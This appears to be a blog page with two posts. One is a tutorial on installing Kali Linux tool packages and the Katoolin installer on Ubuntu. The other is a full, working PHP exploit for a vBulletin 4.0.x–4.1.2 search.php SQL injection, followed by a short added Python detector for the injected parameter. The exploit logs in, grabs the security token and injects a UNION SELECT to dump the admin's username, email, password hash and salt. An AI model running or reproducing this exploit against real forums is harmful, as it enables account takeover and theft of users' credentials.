Sunday, 29 October 2017

Install the packages you want in Kali Linux Light
If you have downloaded the Kali Linux mini or Kali Linux Light image (32-bit or 64-bit), you might find that some tools are missing and only a few basic tools, such as nmap and Aircrack-ng, are available.

Kali Linux provides multiple metapackages that let us easily install subsets of tools based on our particular needs. After installing the mini or Light version of Kali Linux, this is the first thing you will want to do. The steps below show how to install the packages you want.

1. Make sure you have the correct repositories configured. For more information, see http://docs.kali.org/general-use/kali-linux-sources-list-repositories

a. Always take a backup first
# mv /etc/apt/sources.list /etc/apt/sources.list_BAK

b. Create a new repository source file
# vi /etc/apt/sources.list

c. Paste the following
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free

# sudo apt-get update

d. Search the available metapackages
# apt-cache search kali-linux

You can explore further with apt-cache
# apt-cache -h
# apt-cache showpkg kali-linux

e. If you want the kali-linux-web metapackage, install it with the command below
# apt-get install kali-linux-web

To find the list of tools inside each metapackage, see http://tools.kali.org/kali-metapackages

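What if you just want a single tool? For example, if arpspoof is not there by default and you want to install it, first search for the package that provides it:

# apt-cache search arpspoof

arpspoof ships as part of the dsniff package, so install that:

# apt-get install dsniff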

There you go :)

How to Auto Install All Kali Linux Tools Using “Katoolin” on Debian/Ubuntu

Katoolin is a script that helps to install Kali Linux tools on your Linux distribution of choice. Those of us who like to use the penetration testing tools provided by the Kali Linux development team can do so on our preferred Linux distribution by using Katoolin.
In this tutorial we are going to look at the steps to install Katoolin on Debian-based derivatives.

Major Features of Katoolin

  1. Adding Kali Linux repositories.
  2. Removing Kali Linux repositories.
  3. Installing Kali Linux tools.

Requirements

Requirements for installing and using Katoolin:
  1. An operating system; in this case we are using Ubuntu 14.04 64-bit.
  2. Python 2.7

Installing Katoolin

To install Katoolin, run the following commands.
# apt-get install git
# git clone https://github.com/LionSec/katoolin.git  && cp katoolin/katoolin.py /usr/bin/katoolin
Sample Output
Cloning into 'katoolin'...
remote: Counting objects: 52, done.
remote: Total 52 (delta 0), reused 0 (delta 0), pack-reused 52
Unpacking objects: 100% (52/52), done.
Checking connectivity... done.
Then make /usr/bin/katoolin executable by running the command below.
# chmod +x  /usr/bin/katoolin
Now you can run Katoolin as follows.
# katoolin
The output below shows the interface of Katoolin when you run the command.
Sample Output
 $$\   $$\             $$\                         $$\ $$\           
$$ | $$  |            $$ |                        $$ |\__|          
$$ |$$  /  $$$$$$\  $$$$$$\    $$$$$$\   $$$$$$\  $$ |$$\ $$$$$$$\  
$$$$$  /   \____$$\ \_$$  _|  $$  __$$\ $$  __$$\ $$ |$$ |$$  __$$\ 
$$  $$<    $$$$$$$ |  Kali linux tools installer |$$ |$$ |$$ |  $$ |
$$ |\$$\  $$  __$$ |  $$ |$$\ $$ |  $$ |$$ |  $$ |$$ |$$ |$$ |  $$ |
$$ | \$$\ \$$$$$$$ |  \$$$$  |\$$$$$$  |\$$$$$$  |$$ |$$ |$$ |  $$ |
\__|  \__| \_______|   \____/  \______/  \______/ \__|\__|\__|  \__| V1.0 
+ -- -- +=[ Author: LionSec | Homepage: www.lionsec.net
+ -- -- +=[ 330 Tools 
1) Add Kali repositories & Update 
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
As you can see, it provides a menu from which you can select what you want to do.
In case the above installation method fails, you can also try the following steps.
Go to the https://github.com/LionSec/katoolin.git page, download the zip file, and extract it.
# wget https://github.com/LionSec/katoolin/archive/master.zip
# unzip master.zip
After extracting, you should be able to find the katoolin.py script. Run katoolin.py and you will see output similar to the above.
# cd katoolin-master/
# chmod 755 katoolin.py
# ./katoolin.py

How do I use Katoolin?

To add the Kali Linux repositories and update the package lists, select option 1 from the menu.
1) Add Kali repositories & Update 
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 1
1) Add kali linux repositories
2) Update
3) Remove all kali linux repositories
4) View the contents of sources.list file
What do you want to do ?> 1
Sample Output
Executing: gpg --ignore-time-conflict --no-options --no-default-keyring --homedir /tmp/tmp.DC9QzwECdM --no-auto-check-trustdb --trust-model always --keyring /etc/apt/trusted.gpg --primary-keyring /etc/apt/trusted.gpg --keyserver pgp.mit.edu --recv-keys ED444FF07D8D0BF6
gpg: requesting key 7D8D0BF6 from hkp server pgp.mit.edu
gpg: key 7D8D0BF6: public key "Kali Linux Repository <devel@kali.org>" imported
gpg: Total number processed: 1
gpg:               imported: 1  (RSA: 1)
Then you can select option 2 from the interface above to update the repositories. From the output below, I have only captured a portion where Kali Linux repositories are being updated so that one can install Kali Linux tools in Ubuntu.
What do you want to do ?> 2
Ign http://in.archive.ubuntu.com vivid InRelease                                                                                            
Ign http://security.ubuntu.com vivid-security InRelease                                                                                                               
Ign http://in.archive.ubuntu.com vivid-updates InRelease                                                                                                               
Get:1 http://security.ubuntu.com vivid-security Release.gpg [933B]                                                                                                    
Ign http://in.archive.ubuntu.com vivid-backports InRelease                                                                                                                      
Get:2 http://repo.kali.org kali-bleeding-edge InRelease [11.9 kB]                                                                              
Get:3 http://security.ubuntu.com vivid-security Release [63.5 kB]                                                            
Hit http://in.archive.ubuntu.com vivid Release.gpg                                                                              
Get:4 http://repo.kali.org kali-bleeding-edge/main amd64 Packages [8,164 B]                                                
Get:5 http://in.archive.ubuntu.com vivid-updates Release.gpg [933 B]                                                                
Get:6 http://repo.kali.org kali-bleeding-edge/main i386 Packages [8,162 B]                                               
Hit http://in.archive.ubuntu.com vivid-backports Release.gpg    
...  
If you want to delete the Kali Linux repositories you added, then select option 3.
What do you want to do ?> 3
All kali linux repositories have been deleted !
As part of its operation, APT uses the /etc/apt/sources.list file, which lists the 'sources' from which you can obtain and install other packages.
To view the contents of the /etc/apt/sources.list file, select option 4.
What do you want to do ?> 4
#deb cdrom:[Ubuntu 15.04 _Vivid Vervet_ - Release amd64 (20150422)]/ vivid main restricted
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://in.archive.ubuntu.com/ubuntu/ vivid main restricted
deb-src http://in.archive.ubuntu.com/ubuntu/ vivid main restricted
## Major bug fix updates produced after the final release of the
## distribution.
deb http://in.archive.ubuntu.com/ubuntu/ vivid-updates main restricted
deb-src http://in.archive.ubuntu.com/ubuntu/ vivid-updates main restricted
...
To go back, simply type back and press the [Enter] key.
What do you want to do ?> back
1) Add Kali repositories & Update 
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 
To go back to the main menu, simply type gohome and press the [Enter] key.
kat > gohome
1) Add Kali repositories & Update 
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat >
There are different categories of Kali Linux tools you can install on your Ubuntu using Katoolin.
To view the available categories, select option 2 from the main menu.
kat > 2
**************************** All Categories *****************************
1) Information Gathering   8) Exploitation Tools
2) Vulnerability Analysis   9) Forensics Tools
3) Wireless Attacks    10) Stress Testing
4) Web Applications    11) Password Attacks
5) Sniffing & Spoofing    12) Reverse Engineering
6) Maintaining Access    13) Hardware Hacking
7) Reporting Tools     14) Extra
0) All
Select a category or press (0) to install all Kali linux tools .
You can select a category of choice or install all available Kali Linux tools by selecting option (0) and press [Enter] to install.
You can also install the ClassicMenu Indicator using Katoolin.
    1. ClassicMenu Indicator is an application indicator for the top panel of Ubuntu’s Unity desktop environment.
    2. ClassicMenu Indicator provides a simple way to get a classic GNOME-style application menu for those who prefer this over the default Unity dash menu.
For more information, please visit: http://www.florian-diesch.de/software/classicmenu-indicator/
To install the ClassicMenu Indicator, select option 3, then press y and press [Enter].
kat > back
1) Add Kali repositories & Update 
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 3
ClassicMenu Indicator is a notification area applet (application indicator) for the top panel of Ubuntu's Unity desktop environment.
It provides a simple way to get a classic GNOME-style application menu for those who prefer this over the Unity dash menu.
Like the classic GNOME menu, it includes Wine games and applications if you have those installed.
For more information , please visit : http://www.florian-diesch.de/software/classicmenu-indicator/
Do you want to install classicmenu indicator ? [y/n]> y
This PPA contains the most recent alpha/beta releases for
 * Arronax http://www.florian-diesch.de/software/arronax/
 * ClassicMenu Indicator http://www.florian-diesch.de/software/classicmenu-indicator/
* Privacy Indicator http://www.florian-diesch.de/software/indicator-privacy/
 * RunLens http://www.florian-diesch.de/software/runlens/
 * Unsettings http://www.florian-diesch.de/software/unsettings/
 * UUdeLens http://www.florian-diesch.de/software/uudelens
More info: https://launchpad.net/~diesch/+archive/ubuntu/testing
Press [ENTER] to continue or ctrl-c to cancel adding it
gpg: keyring `/tmp/tmpaqk6fphl/secring.gpg' created
gpg: keyring `/tmp/tmpaqk6fphl/pubring.gpg' created
...
You can also install the Kali menu in Ubuntu by selecting option 4, pressing y, and then pressing [Enter].
To quit Katoolin, simply press Control+C.
kat > ^CShutdown requested...Goodbye...
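
Options 3 and 4 above remove and display the Kali entries in sources.list. The following Python is an added example, not part of the original post or of Katoolin: it parses a sources.list and reports every active Kali source, so you can confirm the removal worked before upgrading the host system. The function name, the matching rule (host under kali.org or a suite name starting with "kali") and the sample text are assumptions made for the example.

```python
import re
from urllib.parse import urlparse

# One-line-style APT entry: type, optional [options], URI, suite, components.
ENTRY_RE = re.compile(r"^(deb|deb-src)\s+(?:\[[^\]]*\]\s+)?(\S+)\s+(\S+)(.*)$")


def find_kali_entries(text):
    """Return (line_number, type, host, suite) for each active Kali source.

    Commented-out lines are skipped because APT ignores them too.
    """
    hits = []
    for number, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        match = ENTRY_RE.match(line)
        if not match:
            continue
        kind, uri, suite, _components = match.groups()
        host = urlparse(uri).hostname or ""
        # Assumption: a Kali source is served from kali.org or uses a
        # suite whose name starts with "kali" (e.g. kali-bleeding-edge).
        if host == "kali.org" or host.endswith(".kali.org") or suite.startswith("kali"):
            hits.append((number, kind, host, suite))
    return hits


# Constructed sample: Ubuntu entries like those in the listing above, plus
# a Kali source shaped after the repository seen in the update output.
SAMPLE = """\
#deb cdrom:[Ubuntu 15.04 _Vivid Vervet_ - Release amd64 (20150422)]/ vivid main restricted
deb http://in.archive.ubuntu.com/ubuntu/ vivid main restricted
deb-src http://in.archive.ubuntu.com/ubuntu/ vivid main restricted
deb http://repo.kali.org kali-bleeding-edge main
# deb http://http.kali.org/kali sana main non-free contrib
"""

if __name__ == "__main__":
    for number, kind, host, suite in find_kali_entries(SAMPLE):
        print(f"line {number}: {kind} {host} {suite}")
```

To check a real system, pass it the contents of /etc/apt/sources.list and of each file under /etc/apt/sources.list.d/.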

Monday, 11 September 2017

vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

<?
/*
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

                      888               888    888              
                      888               888    888              
                      888               888    888              
 .d8888b .d88b.   .d88888  .d88b.   .d88888    88888b.  888  888
d88P"   d88""88b d88" 888 d8P  Y8b d88" 888    888 "88b 888  888
888     888  888 888  888 88888888 888  888    888  888 888  888
Y88b.   Y88..88P Y88b 888 Y8b.     Y88b 888    888 d88P Y88b 888
 "Y8888P "Y88P"   "Y88888  "Y8888   "Y88888    88888P"   "Y88888
                                                             888
                                                        Y8b d88P
                                                         "Y88P"

8888888b.         d8888 888888b.    .d8888b.   .d88888b.  888     888 888b    888
888   Y88b       d88888 888  "88b  d88P  Y88b d88P" "Y88b 888     888 8888b   888
888    888      d88P888 888  .88P       .d88P 888     888 888     888 88888b  888
888   d88P     d88P 888 8888888K.      8888"  888     888 888     888 888Y88b 888
8888888P"     d88P  888 888  "Y88b      "Y8b. 888     888 888     888 888 Y88b888
888 T88b     d88P   888 888    888 888    888 888     888 888     888 888  Y88888
888  T88b   d8888888888 888   d88P Y88b  d88P Y88b. .d88P Y88b. .d88P 888   Y8888
888   T88b d88P     888 8888888P"   "Y8888P"   "Y88888P"   "Y88888P"  888    Y888


mail : v.b-4@hotmail.com
*/
?>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
<center>
<h1>vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability</h1>

<form method='post' action=''>
<table border='1'>
<tr><td>Forum Url</td><td> <input type='text' size='100' name='url' value=''></td></tr>
<tr><td>User name</td><td> <input type='text' size='100' name='username' value=''></td></tr>
<tr><td>Password </td><td><input type='text' size='100' name='password' value='' ></td></tr>
<tr><td>Admin ID </td><td><input type='text' size='100' name='admin_id' value=''></td></tr>
<tr><td>Valid Group Search Word</td><td><input type='text'  size='100' name='query'value='romnce'></td></tr>
</table>
<input type="hidden" name="form_action" value="1">
<input type='submit' value='Get'>
</form>
</center>

<?
 if($_POST['form_action'] == 1 )
 {
$query=$_POST["query"];
$url=$_POST["url"];
$admin_id=$_POST["admin_id"];

$sql="&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=".$admin_id."#";
$user=$_POST["username"];
$pass=$_POST["password"];
       $md5Pass = md5($pass);
       $data = "do=login&url=%2Findex.php&vb_login_md5password=$md5Pass&vb_login_username=$user&cookieuser=1";

       $ch = curl_init();

    curl_setopt ($ch, CURLOPT_URL, $url."/login.php?do=login"); // replace ** with tt
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
    curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
    curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
   // curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $store = curl_exec ($ch);

        curl_close($ch);
       $ch = curl_init();

    curl_setopt ($ch, CURLOPT_URL, $url."/search.php"); // replace ** with tt
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
 
 
 
    curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
    //curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $store = curl_exec ($ch);

        curl_close($ch);
$sec=myf($store,'var SECURITYTOKEN = "','";');


       $ch = curl_init();

    curl_setopt ($ch, CURLOPT_URL, $url."/search.php");
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
    curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
    curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch,CURLOPT_POSTFIELDS,"type%5B%5D=7&query=".$query."&titleonly=1&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=after&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=".$sec."&do=process&searchthreadid=".$sql);
    curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
   
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $store = curl_exec ($ch);

        curl_close($ch);



$url2= trim(myf($store,"Location:","Content-Length:"));

       $ch = curl_init();
    curl_setopt ($ch, CURLOPT_URL,$url2);
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
   curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
    //curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $store = curl_exec ($ch);

        curl_close($ch);
echo("<table border='1'>");
$list=explode(":", myf($store,'<p class="description">','</p>'));
echo("<tr><td>User Name</td><td><input size='100' type='text' value='".str_replace("Uncategorized,","",$list['3'])."'></td></tr>");
echo("<tr><td>Mail</td><td><input size='100' type='text' value='".$list['4']."'></td></tr>");
echo("<tr><td>MD5</td><td><input size='100' type='text' value='".$list['5']."'></td></tr>");
echo("<tr><td>Salt</td><td><input size='100' type='text' value='".$list['6']."'></td></tr>");

//print_r($list);
}
function myf($text,$marqueurDebutLien,$marqueurFinLien)

{

$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
$ar=$ar1[0];
return trim($ar);
}
?>
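
The request built above carries its SQL in the `cat[0]` field of the search.php POST body. The following Python is an added example, not part of the original post and not vBulletin code: it flags search requests whose category or thread ID fields hold anything other than an integer, and shows the matching server-side rule of rejecting such values before they reach a query. The function names, the assumption that these IDs are plain decimal integers, and the sample bodies are constructed for the example.

```python
import re
from urllib.parse import parse_qsl

# Assumption: category and thread identifiers are plain decimal integers.
INT_RE = re.compile(r"[0-9]{1,10}")
# Fields of the search form that should only ever hold integers.
CAT_KEY_RE = re.compile(r"cat\[[0-9]*\]")
INT_KEYS = {"searchthreadid"}


def suspicious_search_params(body):
    """Return (name, value) pairs from a search.php POST body that should be
    integers (or empty) but are not."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if CAT_KEY_RE.fullmatch(name) or name in INT_KEYS:
            if value and not INT_RE.fullmatch(value):
                findings.append((name, value))
    return findings


def clean_int_list(values):
    """Server-side counterpart: convert every element to int or reject the
    whole request, so only digits can end up in a query."""
    cleaned = []
    for value in values:
        if not INT_RE.fullmatch(value):
            raise ValueError(f"non-integer id rejected: {value!r}")
        cleaned.append(int(value))
    return cleaned


# Constructed request bodies. The second mirrors the shape of the request
# on this page, with the injected value shortened.
BENIGN = "type%5B%5D=7&query=romnce&do=process&searchthreadid=&cat%5B0%5D=1"
MALICIOUS = "type%5B%5D=7&query=romnce&do=process&searchthreadid=&cat[0]=1) UNION SELECT 1#"

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, suspicious_search_params(body))
```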